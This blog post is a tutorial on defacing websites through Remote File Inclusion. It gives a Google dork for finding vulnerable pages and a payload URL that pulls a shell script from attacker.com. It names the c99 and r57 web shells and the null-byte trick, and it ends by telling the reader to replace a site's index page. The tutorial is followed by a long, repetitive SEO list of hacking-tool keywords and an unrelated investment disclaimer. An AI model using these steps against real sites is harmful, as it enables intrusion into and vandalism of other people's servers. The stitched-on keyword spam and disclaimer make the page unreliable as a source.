Sunday, May 28, 2023

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.

Related word


  1. Pentest Tools Android
  2. Pentest Automation Tools
  3. Pentest Tools Subdomain
  4. Hacking Tools Online
  5. Hacking Tools For Windows
  6. Termux Hacking Tools 2019
  7. Hack Tools Pc
  8. Hacker Techniques Tools And Incident Handling
  9. Hacking Tools For Mac
  10. Hacker Tools Mac
  11. Pentest Box Tools Download
  12. Hack Tools Mac
  13. What Is Hacking Tools
  14. Hacking Tools Hardware
  15. Hack Tools For Windows
  16. Termux Hacking Tools 2019
  17. Hacker Tools For Windows
  18. Black Hat Hacker Tools
  19. Hacker Tools Apk
  20. Hacker Tools Hardware
  21. Hacker Search Tools
  22. Pentest Reporting Tools
  23. Game Hacking
  24. Hacker Tools Linux
  25. Pentest Tools Github
  26. Hackrf Tools
  27. Hacking Tools Software
  28. Pentest Tools List
  29. Hacking Tools For Kali Linux
  30. Hacker Tools Windows
  31. Tools 4 Hack
  32. Hacking Tools And Software
  33. Hacking Tools For Beginners
  34. Hacking Tools Usb
  35. Hack Website Online Tool
  36. Hacking Tools Download
  37. Hacking Tools
  38. Hack Tools Mac
  39. Hacker Tools Mac
  40. Hack Tools Pc
  41. Hacking Tools Pc
  42. Hacking Tools For Beginners
  43. Hack Tools For Pc
  44. Pentest Box Tools Download
  45. Pentest Tools For Android
  46. Hack Tool Apk No Root
  47. Hak5 Tools
  48. Pentest Tools
  49. Hack And Tools
  50. Pentest Tools Framework
  51. Game Hacking
  52. Hacker Tools Apk Download
  53. Kik Hack Tools
  54. Hacker Tools Apk Download
  55. Pentest Tools Tcp Port Scanner
  56. Hacker Tools For Mac
  57. Hack Tools For Pc
  58. Pentest Tools Port Scanner
  59. Hacking Apps
  60. Hacking Tools Mac
  61. Hacking Tools Windows
  62. Hacking Tools Kit
  63. Nsa Hack Tools Download
  64. Underground Hacker Sites
  65. Kik Hack Tools
  66. Hacking Tools Mac
  67. Pentest Tools Open Source
  68. Hacking Tools For Mac
  69. Hacking Tools Download
  70. Hacking Tools For Games
  71. Hacking Tools Windows
  72. Ethical Hacker Tools
  73. Hacker Hardware Tools
  74. Nsa Hacker Tools
  75. Hacker Tool Kit
  76. Hack Tool Apk
  77. Hacker Tools For Mac
  78. Ethical Hacker Tools
  79. Hacking Tools Pc
  80. Best Pentesting Tools 2018
  81. Termux Hacking Tools 2019
  82. Hacker Tools Linux
  83. Hacker Tools Apk
  84. Hacking Tools
  85. Hack Tools 2019
  86. Github Hacking Tools
  87. Hacker Tools Mac
  88. World No 1 Hacker Software
  89. Pentest Tools Open Source
  90. Easy Hack Tools
  91. Growth Hacker Tools
  92. Hack Tool Apk
  93. Hacker Techniques Tools And Incident Handling
  94. Hacker Tools Linux
  95. Hacker Tools Hardware
  96. Hack Tools For Windows
  97. Hacking Tools 2019
  98. Hacking Tools Software
  99. Hacking Tools Software
  100. New Hacker Tools
  101. Pentest Tools Github
  102. Hacking Apps
  103. Hack Tools
  104. Hacking Tools For Windows
  105. Hack Rom Tools
  106. Growth Hacker Tools
  107. Pentest Tools For Mac
  108. Pentest Tools Download
  109. Pentest Automation Tools
  110. Hack Website Online Tool
  111. How To Make Hacking Tools
  112. Best Hacking Tools 2020
  113. Hacking Apps
  114. Github Hacking Tools
  115. Hacker Techniques Tools And Incident Handling
  116. Hacking Tools For Windows 7
  117. Hack Tools For Games
  118. Hacking Tools Usb
  119. Hacker Tools Github
  120. Free Pentest Tools For Windows
  121. Hacker Tools Apk
  122. Pentest Box Tools Download
  123. Hak5 Tools
  124. Pentest Tools For Mac
  125. Hack Tools Online
  126. Hack Tools 2019
  127. Hacking Tools Mac
  128. Pentest Tools For Windows
  129. Hacker Tools Windows
  130. Kik Hack Tools
  131. Hackrf Tools
  132. Pentest Tools Kali Linux
  133. Hacking Tools Download
  134. Pentest Tools Subdomain
  135. Hack Rom Tools
  136. Pentest Tools Review
  137. Pentest Tools Github
  138. Pentest Tools Online
  139. Hacking Tools Kit
  140. Pentest Tools Github
  141. Hacker Search Tools
  142. What Are Hacking Tools
  143. Pentest Tools Port Scanner
  144. Pentest Tools For Ubuntu
  145. Pentest Tools Open Source
  146. Best Hacking Tools 2020
  147. Hacker Tools For Pc
  148. Hacker Tools Apk
  149. Hacking Tools Kit
  150. Hacker Tools For Ios
  151. Wifi Hacker Tools For Windows
  152. What Is Hacking Tools
  153. Hacker Tools List
  154. Pentest Recon Tools
  155. Hacker Techniques Tools And Incident Handling
  156. Ethical Hacker Tools
  157. New Hack Tools
  158. Wifi Hacker Tools For Windows
  159. Hacker Tools Linux
  160. Hack Tool Apk
  161. Hacking Tools For Beginners
  162. Growth Hacker Tools
  163. Black Hat Hacker Tools
  164. Hack Tools For Games
  165. Pentest Tools Alternative
  166. Pentest Tools Open Source
  167. Easy Hack Tools
  168. New Hack Tools
  169. Hacking Tools Download
  170. Hacking Tools For Windows
  171. Hacking Tools Download
  172. Hacking Tools Mac
  173. Pentest Tools Windows

No comments:

Bloomberg - UTV

Must Watch...Ad may come initially.. wait for video.Also keep volume on

Disclaimer



This Document is subject to changes without prior notice and is intended only for the person or entity to which it is addressed to and may contain confidential and/or privileged material and is not for any type of circulation. Any review, retransmission, or any other use is prohibited. Kindly note that this document does not constitute an offer or solicitation for the purchase or sale of any financial instrument or as an official confirmation of any transaction.


The information contained herein is from publicly available data or other sources believed to be reliable. While I would endeavour to update the information herein on reasonable basis, I am under no obligation to update or keep the information current. Also, there may be regulatory, compliance, or other reasons that may prevent me from doing so. I do not represent that information contained herein is accurate or complete and it should not be relied upon as such. This document is prepared for assistance only and is not intended to be and must not alone betaken as the basis for an investment decision. The user assumes the entire risk of any use made of this information. Each recipient of this document should make such investigations as it deems necessary to arrive at an independent evaluation of an investment in the securities of companies referred to in this document (including the merits and risks involved), and should consult its own advisors to determine the merits and risks of such an investment. The investment discussed or views expressed may not be suitable for all investors. I do not undertake to advise you as to any change of my views. I may have issued other reports that are inconsistent with and reach different conclusion from the information presented in this report. This report is not directed or intended for distribution to, or use by, any person or entity who is a citizen or resident of or located in any locality, state, country or other jurisdiction, where such distribution, publication, availability or use would be contrary to law, regulation or which would subject me to any registration or licensing requirement within such jurisdiction. The securities described herein may or may not be eligible for sale in all jurisdictions or to certain category of investors. Persons in whose possession this document may come are required to inform themselves of and to observe such restriction. I may have used the information set forth herein before publication and may have positions in, may from time to time purchase or sell or may be materially interested in any of the securities mentioned or related securities. I may from time to time solicit from, or perform investment banking, or other services for, any company mentioned herein. Without limiting any of the foregoing, in no event shall I or any third party involved in, or related to, computing or compiling the information have any liability for any damages of any kind.